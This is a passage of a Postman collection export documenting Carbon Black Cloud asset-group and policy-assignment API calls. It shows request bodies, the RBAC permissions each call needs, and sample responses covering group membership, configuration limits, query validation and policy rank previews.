group\"\n        },\n        {\n            \"count\": 2,\n            \"ids\": [\n                \"18118181\",\n                \"19245056\"\n            ],\n            \"group_id\": \"6459233a-3b5c-4982-9f34-731542524e37\",\n            \"group_name\": \"Testing 1\",\n            \"group_description\": \"Testing\",\n            \"policy_id\": 19305221,\n            \"policy_name\": \"TESTING PURPOSES\"\n        },\n        {\n            \"count\": 1,\n            \"ids\": [\n                \"18118181\"\n            ],\n            \"group_id\": \"5ba65b7b-843d-438a-9182-85f3c16a971a\",\n            \"group_name\": \"Asset Group #1\",\n            \"policy_id\": 465946,\n            \"policy_name\": \"Testing 2\"\n        },\n        {\n            \"count\": 1,\n            \"ids\": [\n                \"18118181\"\n            ],\n            \"group_id\": \"8fa67fcd-1689-4320-9bcf-a427504e78df\",\n            \"group_name\": \"windows\",\n            \"policy_id\": 20314731,\n            \"policy_name\": \"Testing 3\"\n        },\n        {\n            \"count\": 1,\n            \"ids\": [\n                \"18118181\"\n            ],\n            \"group_id\": \"c97dbc92-6438-48f1-9062-df13b246b6ca\",\n            \"group_name\": \"Windows Developers\",\n            \"group_description\": \"Developer workstations running Windows OS\",\n            \"policy_id\": 165700,\n            \"policy_name\": \"Standard\"\n        },\n        {\n            \"count\": 1,\n            \"ids\": [\n                \"18118181\"\n            ],\n            \"group_id\": \"f2004957-ca49-4c77-921f-8dd70c9c1185\",\n            \"group_name\": \"Test5\",\n            \"group_description\": \"Test5\",\n            \"policy_id\": 465946,\n            \"policy_name\": \"Testing 5\"\n        }\n    ],\n    \"unassigned_properties\": [\n        {\n            \"type\": \"POLICY\",\n            \"count\": 0,\n            \"ids\": []\n        }\n    ]\n}"}],"_postman_id":"f86cfd16-68ea-4a6e-9ac3-800542fa705f"}],"id":"5de620ef-3db8-418f-beb6-1bf4a93ab32c","_postman_id":"5de620ef-3db8-418f-beb6-1bf4a93ab32c","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Members","item":[{"name":"Add Members to Asset Group","id":"1e44f9c5-edbb-4989-a673-47aa8e83cecb","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"action\": \"CREATE\",\n  \"external_member_ids\": [\n    \"18118181\"\n  ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/asset_groups/v1/orgs/{{cb_org_key}}/groups/{{group_id}}/members","description":"<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>group-management</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/asset-groups-api/#add-members-to-asset-group\">See Documentation</a></p>\n<h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"action\": \"&lt;string&gt;\",\n  \"external_member_ids\": [\"&lt;string&gt;\"]\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["asset_groups","v1","orgs","{{cb_org_key}}","groups","{{group_id}}","members"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"1027d6ad-d4f9-482c-9db7-f79cece057f2","name":"Search for Asset Groups Copy","originalRequest":{"method":"POST","header":[{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"action\": \"CREATE\",\n  \"external_member_ids\": [\n    \"18118181\"\n  ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/asset_groups/v1/orgs/{{cb_org_key}}/groups/{{group_id}}/members"},"status":"OK","code":200,"_postman_previewlanguage":"plain","header":[{"key":"Date","value":"Mon, 27 Nov 2023 18:00:40 GMT"},{"key":"Content-Length","value":"0"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=8E19C9EAE0CD0E7AD1284748A4A3B646; Path=/asset_groups; HttpOnly"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":null}],"_postman_id":"1e44f9c5-edbb-4989-a673-47aa8e83cecb"},{"name":"Remove Members from Asset Group","id":"dae8a250-6b4f-4c13-ae2f-7d9113c76abc","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"action\": \"REMOVE\",\n  \"external_member_ids\": [\"18118181\"]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/asset_groups/v1/orgs/{{cb_org_key}}/groups/{{group_id}}/members","description":"<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>group-management</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/asset-groups-api/#remove-members-from-asset-group\">See Documentation</a></p>\n<h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"action\": \"&lt;string&gt;\",\n  \"external_member_ids\": [\"&lt;string&gt;\"]\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["asset_groups","v1","orgs","{{cb_org_key}}","groups","{{group_id}}","members"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"331a26b5-26a8-4e13-bd58-4802ae9207e4","name":"Remove Members from Asset Group","originalRequest":{"method":"POST","header":[{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"action\": \"REMOVE\",\n  \"external_member_ids\": [\"18118181\"]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/asset_groups/v1/orgs/{{cb_org_key}}/groups/f2004957-ca49-4c77-921f-8dd70c9c1185/members"},"status":"No Content","code":204,"_postman_previewlanguage":"plain","header":[{"key":"Date","value":"Mon, 27 Nov 2023 18:38:00 GMT"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=81BCAD55B1DDAD70F4A5CC6B315076B3; Path=/asset_groups; HttpOnly"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":null}],"_postman_id":"dae8a250-6b4f-4c13-ae2f-7d9113c76abc"},{"name":"Get Asset Group Members","id":"2200f538-2d87-48d0-b83b-aa0e228c64e7","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/asset_groups/v1/orgs/{{cb_org_key}}/groups/{{group_id}}/members?rows=1&start=0","description":"<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>group-management</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/asset-groups-api/#get-asset-group-stats\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["asset_groups","v1","orgs","{{cb_org_key}}","groups","{{group_id}}","members"],"host":["{{cb_url}}"],"query":[{"key":"rows","value":"1"},{"key":"start","value":"0"}],"variable":[]}},"response":[{"id":"48c601e1-e055-4a5b-953d-d12db37876e9","name":"Get Asset Group Stats","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/asset_groups/v1/orgs/{{cb_org_key}}/groups/2442bfa3-2ce0-43b5-a323-f79508d60839/membership_summary"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 27 Nov 2023 17:48:39 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"1346"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=CFE232367EFE266096D868864FF71999; Path=/asset_groups; HttpOnly"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"intersections\": [\n        {\n            \"count\": 19,\n            \"ids\": [\n                \"19242056\",\n                \"19242095\",\n                \"19242200\",\n                \"19242311\",\n                \"19242797\",\n                \"19243208\",\n                \"19243414\",\n                \"19243648\",\n                \"19243656\",\n                \"19243721\",\n                \"19243737\",\n                \"19243754\",\n                \"19244090\",\n                \"19244266\",\n                \"19244345\",\n                \"19244582\",\n                \"19244773\",\n                \"19244837\",\n                \"19245056\"\n            ],\n            \"group_id\": \"ef34e934-83eb-45cd-aba7-9a86b31a8d71\",\n            \"group_name\": \"demo group\"\n        },\n        {\n            \"count\": 2,\n            \"ids\": [\n                \"18118181\",\n                \"19245056\"\n            ],\n            \"group_id\": \"6459233a-3b5c-4982-9f34-731542524e37\",\n            \"group_name\": \"Testing Group\",\n            \"group_description\": \"Testing\",\n            \"policy_id\": 19305221,\n            \"policy_name\": \"TEST POLICY\"\n        },\n        {\n            \"count\": 1,\n            \"ids\": [\n                \"18118181\"\n            ],\n            \"group_id\": \"5ba65b7b-843d-438a-9182-85f3c16a971a\",\n            \"group_name\": \"Asset Group #1\",\n            \"policy_id\": 465946,\n            \"policy_name\": \"Testing 2\"\n        },\n        {\n            \"count\": 1,\n            \"ids\": [\n                \"18118181\"\n            ],\n            \"group_id\": \"8fa67fcd-1689-4320-9bcf-a427504e78df\",\n            \"group_name\": \"windows\",\n            \"policy_id\": 20314731,\n            \"policy_name\": \"Testing 3\"\n        },\n        {\n            \"count\": 1,\n            \"ids\": [\n                \"18118181\"\n            ],\n            \"group_id\": \"c97dbc92-6438-48f1-9062-df13b246b6ca\",\n            \"group_name\": \"Windows Developers\",\n            \"group_description\": \"Developer workstations running Windows OS\",\n            \"policy_id\": 165700,\n            \"policy_name\": \"Standard\"\n        },\n        {\n            \"count\": 1,\n            \"ids\": [\n                \"18118181\"\n            ],\n            \"group_id\": \"f2004957-ca49-4c77-921f-8dd70c9c1185\",\n            \"group_name\": \"Test5\",\n            \"group_description\": \"Test5\",\n            \"policy_id\": 465946,\n            \"policy_name\": \"Testing 5\"\n        }\n    ],\n    \"unassigned_properties\": [\n        {\n            \"type\": \"POLICY\",\n            \"count\": 0,\n            \"ids\": []\n        }\n    ]\n}"}],"_postman_id":"2200f538-2d87-48d0-b83b-aa0e228c64e7"},{"name":"Find Which Member Belongs to Which Group","id":"3e172bbc-524d-4e5d-ae49-f9ac31168588","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"external_member_ids\": [\"19242056\"]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/asset_groups/v1/orgs/{{cb_org_key}}/members","description":"<p>Given a list of member IDs, return a map where key is the member ID, and value is a list of group IDs to which it belongs.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>group-management</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/asset-groups-api/#remove-members-from-asset-group\">See Documentation</a></p>\n<h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"external_member_ids\": [\"&lt;string&gt;\"],\n  \"membership_type\" [\"&lt;string&gt;\"]\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["asset_groups","v1","orgs","{{cb_org_key}}","members"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"ed3d254a-e245-4754-a732-0af63df53f6b","name":"Find Which Member Belongs to Which Group","originalRequest":{"method":"POST","header":[{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"external_member_ids\": [\"19242056\"]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/asset_groups/v1/orgs/{{cb_org_key}}/members"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 27 Nov 2023 18:47:28 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"92"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=FC234349D3C7C69A14E21BE294AB5233; Path=/asset_groups; HttpOnly"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"19242056\": [\n        \"ef34e934-83eb-45cd-aba7-9a86b31a8d71\",\n        \"2442bfa3-2ce0-43b5-a323-f79508d60839\"\n    ]\n}"}],"_postman_id":"3e172bbc-524d-4e5d-ae49-f9ac31168588"}],"id":"ab5baba6-71c4-44dd-92e0-c1171e9f1b66","description":"<p>Use calls in this section to change the assets that are included in a group and get details of the assets contained in groups.</p>\n","_postman_id":"ab5baba6-71c4-44dd-92e0-c1171e9f1b66","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Group Query","item":[{"name":"Get Asset Group Configuration","id":"fbe9f96c-753f-4f17-91ad-9904a9495a85","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/asset_groups/v1/orgs/{{cb_org_key}}/configuration","description":"<p>Get a summary of the asset groups configuration, for limits and supported device attributes.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>group-management</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/asset-groups-api/#get-asset-group-configuration\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["asset_groups","v1","orgs","{{cb_org_key}}","configuration"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"a8b8ff8a-7147-41fb-8c09-aa6742c7b63d","name":"Get Asset Group Configuration","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/asset_groups/v1/orgs/{{cb_org_key}}/query_validation"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 27 Nov 2023 17:39:49 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"1055"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=0D30E4CDA1EF9B0B21697A9FC9B97A4B; Path=/asset_groups; HttpOnly"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"asset_groups_configuration_limits\": {\n        \"max_groups_per_org\": 100,\n        \"max_nesting_levels\": 1,\n        \"max_query_criteria_sets\": 5,\n        \"max_query_attributes_per_criteria_set\": 10\n    },\n    \"supported_device_attributes\": [\n        \"os\",\n        \"os_version\",\n        \"ad_org_unit\",\n        \"ad_domain\",\n        \"ad_distinguished_name\",\n        \"name\",\n        \"last_internal_ip_address\",\n        \"sensor_version\",\n        \"vm_name\",\n        \"vcenter_uuid\",\n        \"cluster_name\",\n        \"esx_host_name\",\n        \"datacenter_name\",\n        \"email\",\n        \"vcenter_host_url\",\n        \"login_user_name\",\n        \"golden_device\",\n        \"vdi_provider\",\n        \"cloud_provider_account_id\",\n        \"cloud_provider_scale_group\",\n        \"cloud_provider_tags\",\n        \"cloud_provider_network\",\n        \"infrastructure_provider\",\n        \"passive_mode\",\n        \"quarantined\",\n        \"last_external_ip_address\"\n    ]\n}"}],"_postman_id":"fbe9f96c-753f-4f17-91ad-9904a9495a85"},{"name":"Supported Attribute Keywords","id":"fe6a4c03-8218-4093-8ad5-d612e0b2577f","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/asset_groups/v1/orgs/{{cb_org_key}}/attributes","description":"<p>Retrieve list of keywords that can be used in query</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>group-management</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/asset-groups-api/#supported-attribute-keywords\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["asset_groups","v1","orgs","{{cb_org_key}}","attributes"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"b691e7e2-b221-4bee-aadb-ba7e5fb81728","name":"Supported Attribute Keywords","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/asset_groups/v1/orgs/{{cb_org_key}}/attributes"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 27 Nov 2023 17:39:49 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"1055"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=0D30E4CDA1EF9B0B21697A9FC9B97A4B; Path=/asset_groups; HttpOnly"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"[\n    {\n        \"name\": \"sensor_version\",\n        \"type\": \"string\",\n        \"matchers\": [\n            \"not_equals\",\n            \"contains\",\n            \"ends_with\",\n            \"not_contains\",\n            \"equals\",\n            \"starts_with\"\n        ]\n    },\n    {\n        \"name\": \"vcenter_uuid\",\n        \"type\": \"string\",\n        \"matchers\": [\n            \"not_equals\",\n            \"ends_with\",\n            \"equals\",\n            \"starts_with\"\n        ]\n    },\n    ... <truncated> ...\n]"}],"_postman_id":"fe6a4c03-8218-4093-8ad5-d612e0b2577f"},{"name":"Validate Query","id":"58eb3597-ec90-4f9c-bcd5-bbb96778c8e6","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"query\": \"<string>\",\n  \"content_type\": \"<string>\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/asset_groups/v1/orgs/{{cb_org_key}}/query_validation","description":"<p>Validates group query based on the content type</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>group-management</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/asset-groups-api/#validate-query\">See Documentation</a></p>\n<h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"query\": \"&lt;string&gt;\",\n  \"content_type\": \"&lt;string&gt;\"\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["asset_groups","v1","orgs","{{cb_org_key}}","query_validation"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"40a52e83-abb8-48bd-a890-0c9d3b2b7850","name":"Validate Query","originalRequest":{"method":"POST","header":[{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"query\": \"invalid:test\",\n  \"content_type\": \"DEVICE\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/asset_groups/v1/orgs/{{cb_org_key}}/query_validation"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 27 Nov 2023 17:39:49 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"1055"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=0D30E4CDA1EF9B0B21697A9FC9B97A4B; Path=/asset_groups; HttpOnly"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"valid\": false,\n    \"errors\": [\n        {\n            \"error_code\": \"AGS_INVALID_QUERY_INTERNAL\",\n            \"message\": \"Invalid attribute [invalid] found in query.\",\n            \"args\": [\n                \"Invalid attribute [invalid] found in query.\"\n            ]\n        }\n    ]\n}"}],"_postman_id":"58eb3597-ec90-4f9c-bcd5-bbb96778c8e6"}],"id":"da87f436-9c4c-4ef6-ade6-3d271596fbe8","_postman_id":"da87f436-9c4c-4ef6-ade6-3d271596fbe8","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Preview Policies Rank Change","id":"2008d0fd-6d86-4a32-b18f-5122a594c894","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"policies\": [\n    {\n      \"id\": 465946,\n      \"position\": 3\n    }\n  ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/policy-assignment/v1/orgs/{{cb_org_key}}/policies/preview","description":"<p>Preview changes in the ranking of policies. Use this API call to see how a change in the rank of a policy or policies will affect assets.<br />Rank policies in order of importance. When an asset is assigned more than one policy, the highest-ranking policy takes precedence.</p>\n<p>To view order of policies based on their ranking, use the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/#get-policies-order-by-rank\">Get Policies Order by Rank</a> API call.</p>\n<p>To make the actual change in the rank of a policy or policies, use the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/#update-policy-ranks\">Update Policy Ranks</a> API call.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/asset-groups-api/#preview-policies-rank-change\">See Documentation</a></p>\n<h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"policies\": {\n    \"id\": &lt;integer&gt;,\n    \"position\": &lt;integer&gt;\n  }\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policy-assignment","v1","orgs","{{cb_org_key}}","policies","preview"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"914c3992-b38f-4539-8915-71cc73afe788","name":"Preview Policies Rank Change","originalRequest":{"method":"POST","header":[{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"policies\": [\n    {\n      \"id\": 465946,\n      \"position\": 3\n    }\n  ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/policy-assignment/v1/orgs/{{cb_org_key}}/policies/preview"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 27 Nov 2023 14:33:11 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"255"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Logtraceid","value":"14b2954e-b7e5-4ef0-ae67-a15f3680639a"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=9551FC5CFE353E972021E164D8C0DDF3; 